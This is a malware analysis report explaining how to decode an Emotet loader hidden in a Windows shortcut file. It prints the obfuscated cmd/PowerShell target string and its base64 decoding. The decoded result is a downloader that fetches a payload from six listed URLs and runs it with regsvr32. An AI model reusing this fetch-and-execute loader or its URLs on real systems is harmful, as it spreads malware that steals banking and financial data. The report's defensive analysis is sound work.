By Alexandre Siviero - Emotet is a trojan spread predominantly through fraudulent emails (malspam). The infection can arrive via malicious script, macro-enabled document files or malicious links. Emails containing Emotet can contain familiar promotions designed in such a way that they look like a legitimate email.
It was possible to get a sample of Emotet using the Triage website.
The focus of this report is not to explain in detail how Emotet works, but rather how to identify and decode the latest version of the payload that disseminates it. However, throughout it we will provide names of functions and modules involved in this creation, along with references that the reader can consult if they wish to delve deeper into the subject.
De-fuscation order
Below is the sample taken from Triage.
Unlike past campaigns to spread this family of malware, this is not an Office document with malicious macros. The current campaign uses Windows shortcut files (.lnk extension), just like the example above.
To begin the analysis, we inspected the properties of the shortcut in question:
In the target field, we noticed something unusual for files of this nature: the presence of a Powershell command to decode base64 strings . Unfortunately, the content of this shortcut's target is too long for the file's properties window.
To get around this, we used the HxD tool, which allows you to view the contents of any file in hexadecimal. The following image shows part of the string encoded in base64.
As it is impossible to understand this type of string humanly, with the help of the cyberchef tool, it was possible to decode the String, finding the following code:
After translation, you can see some of the code contained in the file. You can see the path \Windows\system32\cmd.exe, followed by an invocation of powershell (obfuscated as p.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.e) and the base64 string .
c.m.d...e.x.e.............\.....\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.m.d...e.x. e.i./.v.:.o.n. ./.c.
.D.u.X.P.q.w.j.y.n.h.P.K.5.p.0.T.Y.c.a.C.f.4.G.k.A.t.B.W.l.J.m.P.l.w.q.d.5.q.s.n
.f.H.o.5.m.V.y.k.N.t.c.g.e.W.N.2.k.Q.L.m.a.c.K.q.V.A.R.F.E.g.F.V.|.|.g.o.t.o.&.p
.^.o.^.w.^.e.^.r.^.s.^.h.^.e.^.l.^.l...e.^.x.^.e. .-.c. .".&.{. .i.e.x.
.(.[.s.t.r.i.n.g.].[.S.y.s.t.e.m...T.e.x.t...E.n.c.o.d.i.n.g.].:.:.A.S.C.I.I...G
.e.t.S.t.r.i.n.g.(.[.S.y.s.t.e.m...C.o.n.v.e.r.t.].:..F.r.o.m.B.a.s.e.6.4.S.t.r
.i.n.g.(.'.J.F.B.y.b.2.d.y.Z.X.N.z.U.H.J.l.Z.m.V.y.Z.W.5.j.Z.T.0.i.U.2.l.s.Z.W.5
.0.b.H.l.D.b.2.5.0.a.W.5.1.Z.S.I.7.J.G.x.p.b.m.t.z.P.S.g.i.a.H.R.0.c.D.o.v.L.2.h
.v.M.j.g.w.M.z.E.5.M.D.A.x.L.m.h.v.Z.2.l.i.b.y.5.u.Z.X.Q.v.a.W.5.j.b.H.V.k.Z.S.9
.0.Z.1.F.3.e.G.l.j.N.F.F.3.d.U.0.v.I.i.w.i.a.H.R.0.c.D.o.v.L.3.d.3.d.y.5.n.Z.X.J
.v.b.n.R.v.Z.2.V.y.a.W.F.0.c.m.l.h.L.m.9.y.Z.y.9.0.b.X.A.v.Y.0.I.2.Y.2.d.U.V.m.Z
.5.e.V.o.z.Y.j.F.3.O.W.Q.v.I.i.w.i.a.H.R.0.c.D.o.v.L.2.N.s.d.W.J.t.Y.W.5.h.Z.2.V
.y.L.m.5.l.d.C.5.h.c.i.9.w.c.n.V.l.Y.m.E.v.V.k.5.x.c.3.g.z.N.j.h.G.S.H.F.L.S.y.8
.i.L.C.J.o.d.H.R.w.O.i.8.v.b.X.l.t.a.W.N.y.b.2.d.y.Z.W.V.u.L.m.1.p.Z.2.h.0.Y.2.9
.k.Z.S.5.j.b.2.0.v.R.m.9.4.L.U.M.v.b.m.h.N.W.X.d.r.R.l.h.C.L.y.I.s.I.m.h.0.d.H.A
.6.L.y.9.0.b.3.d.h.c.m.R.z.d.W.4.u.b.m.V.0.L.2.F.k.b.W.l.u.L.z.h.O.V.z.J.U.S.m.V
.Q.c.z.h.k.W.m.h.i.L.y.I.s.I.m.h.0.d.H.A.6.L.y.9.o.a.3.d.p.b.m.R.z.Y.W.N.h.Z.G.V
.t.e.S.5.z.e.W.5.v.b.G.9.n.e.S.5.t.Z.S.9.A.Z.W.F.E.a.X.I.v.c.U.g.y.R.U.h.1.d.l.l
.W.b.0.p.F.S.j.I.v.I.i.k.7.Z.m.9.y.Z.W.F.j.a.C.A.o.J.H.U.g.a.W.4.g.J.G.x.p.b.m.t
.z.K.S.B.7.d.H.J.5.I.H.t.J.V.1.I.g.J.H.U.g.L.U.9.1.d.E.Z.p.b.G.U.g.J.G.V.u.d.j.p
.U.R.U.1.Q.L.0.R.3.R.V.h.y.Y.2.d.O.W.G.o.u.U.X.l.V.O.1.J.l.Z.3.N.2.c.j.M.y.L.m.V
.4.Z.S.A.k.Z.W.5.2.O.l.R.F.T.V.A.v.R.H.d.F.W.H.J.j.Z.0.5.Y.a.i.5.R.e.V.U.7.Y.n.J
.l.Y.W.t.9.I.G.N.h.d.G.N.o.I.H.s.g.f.X.0.=.'.).). .}.
When trying to translate base64, we noticed that the dots between characters are a feature of string storage in UTF16-LE (each character is separated by a null byte, which is translated as "."). To make it easier to read, we used a simple python script to remove the unnecessary dots:
string = [STRING IN UNICODE]
unistring = ""
for i in range(0, (len(string)-1)): if i == 0:
unistring += string[i] i+=1
if string[i-1] == ".":
if string[i-2] == "." and string[i] == ".": pass
else:
unistring += string[i] i+=1
print(unistring)
Returning the following result:
"C:\Windows\system32\cmd.exe" /v:on /c DuXPqwjynhPK5p0TYcaCf4GkAtBWlJmPlwqd5qsnfHo5mVykNtcgeWN2kQLmacKqVARFEgFV||goto&p
^o^w^e^r^s^h^e^l^l.e^x^e -c “&{ iex ([string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64Str ing(‘JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2h vMjgwMzE5MDAxLmhvZ2liby5uZXQvaW5jbHVkZS90Z1F3eGljNFF3dU0vIiwiaHR0cDovL3d3dy5nZXJ vbnRvZ2VyaWF0cmlhLm9yZy90bXAvY0I2Y2dUVmZ5eVozYjF3OWQvIiwiaHR0cDovL2NsdWJtYW5hZ2V yLm5ldC5hci9wcnVlYmEvVk5xc3gzNjhGSHFLSy8iLCJodHRwOi8vbXltaWNyb2dyZWVuLm1pZ2h0Y29 kZS5jb20vRm94LUMvbmhNWXdrRlhCLyIsImh0dHA6Ly90b3dhcmRzdW4ubmV0L2FkbWluLzhOVzJUSmV QczhkWmhiLyIsImh0dHA6Ly9oa3dpbmRzYWNhZGVteS5zeW5vbG9neS5tZS9AZWFEaXIvcUgyRUh1dll Wb0pFSjIvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjp URU1QL0R3RVhyY2dOWGouUXlVO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvRHdFWHJjZ05Yai5ReVU7YnJ lYWt9IGNhdGNoIHsgfX0=’))) }”
With the help of the cyberchef tool, it is possible to decode the above string . We can finally clearly read the attacker's intentions:
$ProgressPreference="SilentlyContinue";
$links=(“http://ho280319001.hogibo.net/include/tgQwxic4QwuM/“, “http://www.gerontogeriatria.org/tmp/cB6cgTVfyyZ3b1w9d/“, “http://clubmanager.net.ar/prueba/VNqsx368FHqKK/“, “http://mymicrogreen.mightcode.com/Fox-C/nhMYwkFXB/“, “http://towardsun.net/admin/8NW2TJePs8dZhb/“, “http://hkwindsacademy.synology.me/@eaDir/qH2EHuvYVoJEJ2/“); for each ($u in $links) {
try {
IWR $u -OutFile $env:TEMP/DwEXrcgNXj.QyU; Regsvr32.exe $env:TEMP/DwEXrcgNXj.QyU;break
}
catch { }
}
The code above has six URLs, contained in a variable named links. The loop then tries to access one of these addresses, download its contents to the temporary folder (env:TEMP/DwEXrcgNXj.QyU) and execute it using the regsvr32.exe application (used to execute DLLs). If this attempt is successful, the loop is terminated. The idea behind this code is to provide alternative sources for the final payload . If any of the addresses are unavailable, the algorithm tries the same procedure for the next one on the list.
Recommendations
We are all targets of Emotet. To date, Emotet has hit individuals, companies and government entities all over the world, stealing bank logins, financial data and even bitcoin wallets.
Of particular note is an Emotet attack on the city of Allentown, PA, which required the direct help of Microsoft's incident response team to clean up and cost the city more than 1 million dollars to repair.
Now that Emotet is being used to download and spread other banking Trojans, the list of targets could be even wider. The first versions of Emotet were used to attack bank customers in Germany. Later versions of Emotet targeted organizations in Canada, the United Kingdom and the United States. The campaigns seen in 2022, on the other hand, focus on the whole world, an example of which had the subject line "buona pasqua, happy Easter", but attached to the email was a malicious XLS file to spread and "install" Emotet.
References
- https://pt.malwarebytes.com/emotet/
- https://www.checkpoint.com/press/2022/february-2022s-most-wanted-malware-emotet-remains- number-one-while-trickbot-slips-even-further-down-the-index/
- https://www.youtube.com/watch?v=-W4yZifokx0
- https://canaltech.com.br/seguranca/governo-do-japao-lanca-ferramenta-que-detecta-nova-versao- do-malware-emotet-215176/